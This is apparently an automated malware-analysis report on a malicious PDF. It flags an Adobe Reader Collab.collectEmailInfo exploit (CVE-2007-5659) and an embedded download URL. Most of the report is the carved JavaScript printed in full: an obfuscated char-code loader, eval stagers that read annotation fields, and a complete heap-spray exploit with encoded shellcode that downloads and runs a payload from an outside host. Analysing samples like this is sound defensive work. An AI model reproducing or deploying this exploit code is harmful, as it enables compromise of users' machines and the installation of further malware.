Verdict: MALICIOUS
Risk Score: 266
Malware Insights
MITRE ATT&CK: T1059.001 PowerShell
The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT and PDF_JS. The JavaScript streams, particularly 'numeric_charcode_stage_000.js' and 'legacy_pdfkit_stage_000.js', are obfuscated and appear intended to decode and execute further code. This pattern is commonly used to download and execute a second-stage payload. The 'PDF_FOXIT_SYNCANNOTSCAN' heuristic further supports the use of JavaScript for malicious actions within the PDF structure.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (9)
- Collab.collectEmailInfo — CVE-2007-5659 (critical; CVE exact; rule CVE_2007_5659): PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (Identified after JavaScript deobfuscation.)
- JavaScript action (low; 4 related findings; rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) (high; CVE likely; rule PDF_JS_ADOBE_APSB08_13_PATCH_GATE): PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  Matched line in script (truncated): var b_e_N_t3_l = new Array();var qkaIU__28E = 0;var xP_ATP_X6AB1Q61 = "";function JTQ6_e(D7u7_W, Gw7WS2){var R5___bd3hCNiT = Gw7WS2.toString();var CL__Nb = "";for(var hy47_k_xUx_s = 0; hy47_k_xUx_s < R5___bd3hCNiT.length; hy47_k_xUx_s++) {var d_RHO__658g = parseInt(R5___bd3hCNiT.substr(hy47_k_xUx_s, 1));if (!isNaN(d_RHO__658g)) {d_RHO__658g = d_RHO__658g.toString(16);if (d_RHO__658g.length == 1) { d_RHO__658g = "0" + d_RHO__658g; }else if (d_RHO__658g.length != 2) { d_RHO__658g = "00"; }CL__Nb = …
- PDF JavaScript exploit cluster (critical; rule PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  Matched line in script: for (var i=0; i < list.length; i++) { result += String.fromCharCode(list[i] - jump); }
- PDF exploit shellcode contains an embedded download URL (high; rule PDF_JS_SHELLCODE_DOWNLOAD_URL): Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream (low; rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- syncAnnotScan annotation-staging primitive (low; rule PDF_FOXIT_SYNCANNOTSCAN): PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (Identified after JavaScript deobfuscation.)
- Suspicious extracted artifact (info; rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info; rule EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://googleinru.in/cgi-bin/etn/z004106201r0019R357a796fXcffdb74bY376c4c04Z0100f060 (referenced by PDF JavaScript)
Extracted artifacts (4)
Files carved from inside the sample during analysis.
javascript_obj0004_000.js
- Kind: pdf-javascript-stream
- Source: PDF /JS object 4 at offset 0xE1
- Size: 1940 bytes
- SHA-256: be4694a17eb89a55f7eb3db389ba2bc4f102f4c7dcfc99549d848cdb7df5dfb5
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token(s))
Preview script (first 1,000 lines of the extracted script):
sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,9,118,97,114,32,112,114,111,99,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,50,50,43,49,53,41,59,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,32,123,13,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,9,97,112,112,91,102,110,99,93,40,98,117,102,41,59,13,10,125,13,10";
function decrypt(str, jump){
var result = "";
var list = str.split(',');
for (var i=0; i < list.length; i++) {
result += String.fromCharCode(list[i] - jump);
}
return result;
}
numeric_charcode_stage_000.js
- Kind: deobfuscated-js
- Source: numeric char-code string decoded JavaScript at offset 0xEF
- Size: 505 bytes
- SHA-256: 6c41320119e160dc719997b9a2efb3600ea9d7e9d7e44b4dc2125762dc9f365f
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 2 eval/decoder/string-building token(s))
Preview script (first 1,000 lines of the extracted script):
var pr = null;
var fnc = 'ev';
var sum = '';
app.doc.syncAnnotScan();
if (app.plugIns.length != 0) {
var num = 1;
pr = app.doc.getAnnots(
{
nPage: 0
}
);
sum = pr[num].subject;
}
var buf = "";
if (app.plugIns.length > 3) {
fnc += 'a';
var arr = sum.split(/-/);
var proc = String.fromCharCode(22+15);
for (var i = 1; i < arr.length; i++) {
buf += String.fromCharCode("0x"+arr[i]);
}
}
if (app.plugIns.length >= 2) {
fnc += 'l';
app[fnc](buf);
}
legacy_pdfkit_stage_000.js
- Kind: deobfuscated-js
- Source: repeated-marker hex decoded JavaScript at offset 0x1BCB
- Size: 1708 bytes
- SHA-256: 3894930d59a3c32588e0ee57766ee2edce02f6fc0cdfe1040b292a57998175cc
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token(s))
Preview script (first 1,000 lines of the extracted script):
function d__N___m_Ro(ryfP__gn, aeP_54__oJt6d4a){var v_W61y3Ye = 4;var Xo_T_m = new Array();var S8j2wd_i4_j02e7 = new Array(107,256,11, 512, 106, 11, 44,40, 33);S8j2wd_i4_j02e7[5] += 12;var GH_n07_p60Yu = "";try {var v85dC_y = 0;if (app) {aeP_54__oJt6d4a = pr[v85dC_y].subject;}} catch(e) {}if (!ryfP__gn) { Xo_T_m[0] = 0;Xo_T_m[1] = Xo_T_m[0];Xo_T_m[2] = Xo_T_m[1];Xo_T_m[3] = Xo_T_m[2];var qD_dsN20_N = S8j2wd_i4_j02e7[6] + 3;var n2_53_Yv = qD_dsN20_N + 11;var OG_36p = d__N___m_Ro;var W20HpBw_0H = 0;OG_36p = OG_36p.toString();for(var G_n_S1_s1n2G1 = 0; G_n_S1_s1n2G1 < OG_36p.length; G_n_S1_s1n2G1++) {var Y0_ccy_c = OG_36p.charCodeAt(G_n_S1_s1n2G1);if (Y0_ccy_c > qD_dsN20_N && Y0_ccy_c < n2_53_Yv) {if (W20HpBw_0H == 4) {W20HpBw_0H = 0;}Xo_T_m[W20HpBw_0H] += Y0_ccy_c;if (Xo_T_m[W20HpBw_0H] > S8j2wd_i4_j02e7[3]) {Xo_T_m[W20HpBw_0H] -= 512;}W20HpBw_0H++;}}}else { Xo_T_m = ryfP__gn;}for (var de_p_0q5_3_dh = 0; de_p_0q5_3_dh < 4; de_p_0q5_3_dh++) {if (Xo_T_m[de_p_0q5_3_dh] > S8j2wd_i4_j02e7[1]) {Xo_T_m[de_p_0q5_3_dh] -= S8j2wd_i4_j02e7[1];}}var YVf7Hc6R6 = 0;var O8s_8VR_7X_J = 0;var D_B___0_P_Ht;var bmV_54c = 0;while ( YVf7Hc6R6 < aeP_54__oJt6d4a.length ) {var rb__U_c6E__of8u = "";rb__U_c6E__of8u = aeP_54__oJt6d4a.substr(YVf7Hc6R6, 2);var i__0x8fO__3 = parseInt(rb__U_c6E__of8u, S8j2wd_i4_j02e7[5]); if (O8s_8VR_7X_J == 4) {O8s_8VR_7X_J = 0;}i__0x8fO__3 -= (bmV_54c + 2) * Xo_T_m[O8s_8VR_7X_J];if (i__0x8fO__3 < 0) {i__0x8fO__3 -= Math.floor(i__0x8fO__3 / S8j2wd_i4_j02e7[1]) * S8j2wd_i4_j02e7[1];}GH_n07_p60Yu += String.fromCharCode(i__0x8fO__3);{YVf7Hc6R6 += 2;bmV_54c++;O8s_8VR_7X_J++;}}var v3i5nM_p_WKY_R = this;v3i5nM_p_WKY_R["eval"](GH_n07_p60Yu);return 0;}
d__N___m_Ro(0);
legacy_pdfkit_stage_001.js
- Kind: deobfuscated-js
- Source: annotation-subject callee-key decoded JavaScript at offset 0x4C3
- Size: 4936 bytes
- SHA-256: 48c70d294d1dba198860b262a662bc3bc7e0619f37e07954f39c150b48a0e008
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 5 eval/decoder/string-building token(s))
Preview script (first 1,000 lines of the extracted script):
var b_e_N_t3_l = new Array();var qkaIU__28E = 0;var xP_ATP_X6AB1Q61 = "";function JTQ6_e(D7u7_W, Gw7WS2){var R5___bd3hCNiT = Gw7WS2.toString();var CL__Nb = "";for(var hy47_k_xUx_s = 0; hy47_k_xUx_s < R5___bd3hCNiT.length; hy47_k_xUx_s++) {var d_RHO__658g = parseInt(R5___bd3hCNiT.substr(hy47_k_xUx_s, 1));if (!isNaN(d_RHO__658g)) {d_RHO__658g = d_RHO__658g.toString(16);if (d_RHO__658g.length == 1) { d_RHO__658g = "0" + d_RHO__658g; }else if (d_RHO__658g.length != 2) { d_RHO__658g = "00"; }CL__Nb = d_RHO__658g + CL__Nb;}}while(CL__Nb.length < 8) { CL__Nb = "0" + CL__Nb; }var JwEHpe764Ey = D7u7_W.toString(16);if (JwEHpe764Ey.length == 1) { JwEHpe764Ey = "0" + JwEHpe764Ey; }else if (JwEHpe764Ey.length != 2) { JwEHpe764Ey = "00"; }CL__Nb = "3" + JwEHpe764Ey + "P" + CL__Nb;return CL__Nb;}function q_b__W_mXC_BN(X5___1vtj__2s, IA58CSo38a3){var QW5_7_Cm1 = new Array("");var e_n0_7e0U = X5___1vtj__2s;var Ug__Toc;if ((Ug__Toc = X5___1vtj__2s.lastIndexOf("%u00")) != -1) {if (Ug__Toc + 6 == X5___1vtj__2s.length) {QW5_7_Cm1[0] = X5___1vtj__2s.substr(Ug__Toc + 4, 2);e_n0_7e0U = X5___1vtj__2s.substring(0, Ug__Toc);}}Ug__Toc = 1;for (hy47_k_xUx_s = 0; hy47_k_xUx_s < IA58CSo38a3.length; hy47_k_xUx_s++) {var Y_26_4F = IA58CSo38a3.charCodeAt(hy47_k_xUx_s).toString(16);if (Y_26_4F.length == 1) { Y_26_4F = "0" + Y_26_4F; }QW5_7_Cm1[Ug__Toc] = Y_26_4F;Ug__Toc++;}hy47_k_xUx_s = QW5_7_Cm1[0].length ? 
0 : 1;QW5_7_Cm1[Ug__Toc] = "00";QW5_7_Cm1[Ug__Toc + 1] = "00";Ug__Toc += 2;if ((QW5_7_Cm1.length - hy47_k_xUx_s) % 2) {QW5_7_Cm1[Ug__Toc] = "00";}while(hy47_k_xUx_s < QW5_7_Cm1.length) {e_n0_7e0U += "%u" + QW5_7_Cm1[hy47_k_xUx_s + 1] + QW5_7_Cm1[hy47_k_xUx_s];hy47_k_xUx_s += 2;}e_n0_7e0U += "%u0000";return e_n0_7e0U;}function DWcO_bxe8(nubGP12_Nf_O_p, C__F_y6c1__IDxj){while (nubGP12_Nf_O_p.length*2<C__F_y6c1__IDxj) {nubGP12_Nf_O_p += nubGP12_Nf_O_p;}nubGP12_Nf_O_p = nubGP12_Nf_O_p.substring(0,C__F_y6c1__IDxj/2);return nubGP12_Nf_O_p;}function L__rh182t(Sm4__pg__jm_e, y8aYg4D_Ol3Mc3, Apn_1k){var qM_d__O4T__f = 0x0c0c0c0c;var nubGP12_Nf_O_p = unescape(y8aYg4D_Ol3Mc3);var IA58CSo38a3 = JTQ6_e(Sm4__pg__jm_e, Apn_1k);var J24K___RUo = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var X5___1vtj__2s = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u6d70%u4157%u0068%u7468%u7074%u2f3a%u672f%u6f6f%u6c67%u6965%u726e%u2e75%u6e69%u632f%u6967%u622d%u6e69%u65
2f%u6e74%u7a2f%u3030%u3134%u3630%u3032%u7231%u3030%u3931%u3352%u3735%u3761%u3639%u5866%u6663%u6466%u3762%u6234%u3359%u3637%u3463%u3063%u5a34%u3130%u3030%u3066%u3036";app.G5M_Yc60_x = unescape(q_b__W_mXC_BN(X5___1vtj__2s, IA58CSo38a3));var ph464esB1_4e = 0x400000;var D_5l5Q37_H_p8f = J24K___RUo.length * 2;var C__F_y6c1__IDxj = ph464esB1_4e - (D_5l5Q37_H_p8f+0x38);nubGP12_Nf_O_p = DWcO_bxe8(nubGP12_Nf_O_p, C__F_y6c1__IDxj);var pc453X2KjLi = (qM_d__O4T__f - 0x400000)/ph464esB1_4e;for (var w_C3__1Kx_bdO = 0; w_C3__1Kx_bdO < pc453X2KjLi; w_C3__1Kx_bdO++) {b_e_N_t3_l[w_C3__1Kx_bdO] = nubGP12_Nf_O_p + J24K___RUo;}}function C8_Q33(){var x51_MU__tqjQ0 = "";for (hy47_k_xUx_s = 0; hy47_k_xUx_s < 12; hy47_k_xUx_s++) {x51_MU__tqjQ0 += unescape("%u0c0c%u0c0c");}var qP0_b6k = "";for (hy47_k_xUx_s = 0; hy47_k_xUx_s < 750; hy47_k_xUx_s++) {qP0_b6k += x51_MU__tqjQ0;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: qP0_b6k});app.clearTimeOut(qkaIU__28E);}function O1t_Q1(ds_x_b6r){var H__Cm8b2 = qkaIU__28E;if ((ds_x_b6r >= 8 && ds_x_b6r < 8.11) || ds_x_b6r < 7.1) {L__rh182t(23, "%u0c0c%u0c0c", ds_x_b6r);C8_Q33();}if (H__Cm8b2) {app.clearTimeOut(H__Cm8b2);}}var Apn_1k = 0;var iD0__846o___7I6 = app.plugIns;for (var yd_VS_vH = 0; yd_VS_vH < iD0__846o___7I6.length; yd_VS_vH++) {var A_3_EI_0 = iD0__846o___7I6[yd_VS_vH].version;if (A_3_EI_0 > Apn_1k) { Apn_1k = A_3_EI_0; }}if (app.viewerVersion == 9.103 && Apn_1k < 9.13) {Apn_1k = 9.13;}app.a____q = O1t_Q1;qkaIU__28E = app.setTimeOut("app.a____q(" + Apn_1k.toString() + ")", 50);